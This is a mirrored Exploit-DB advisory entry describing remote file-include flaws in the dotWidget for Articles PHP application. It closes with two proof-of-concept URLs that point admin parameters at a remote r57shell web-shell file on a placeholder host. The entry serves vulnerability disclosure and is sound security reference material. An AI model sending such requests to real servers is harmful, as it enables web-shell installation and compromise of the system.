exploit-db-mirror/exploits/php/webapps/28045.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

10 lines
No EOL
846 B
Text

source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/categories.php?admin_header_file=http://www.example2.com/r57shell.txt?
http://www.example.com/path/admin/categories.php?admin_footer_file=http://www.example2.com/r57shell.txt?